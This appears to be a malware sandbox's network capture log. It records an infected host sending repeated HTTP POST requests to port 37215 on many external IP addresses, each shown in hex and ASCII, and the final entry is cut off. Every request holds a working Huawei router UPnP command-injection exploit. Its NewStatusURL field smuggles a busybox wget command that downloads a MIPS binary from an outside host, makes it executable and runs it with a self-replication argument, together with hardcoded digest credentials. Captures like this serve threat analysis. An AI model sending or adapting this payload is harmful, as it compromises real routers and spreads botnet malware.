                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1027192.168.2.153791041.76.61.11037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.730329037 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1028192.168.2.1550510197.154.126.4537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.730369091 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1029192.168.2.1536100157.53.50.23437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.730417967 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1030192.168.2.1560502148.166.246.1237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.730478048 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1031192.168.2.155456441.212.58.10637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.730549097 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1032192.168.2.154620641.247.227.5137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.730581045 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1033192.168.2.1558196201.32.81.20037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.730606079 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1034192.168.2.1547050197.4.72.23137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.730642080 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1035192.168.2.153969017.24.234.1137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.694308043 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1036192.168.2.1556234216.85.172.24037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.694346905 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 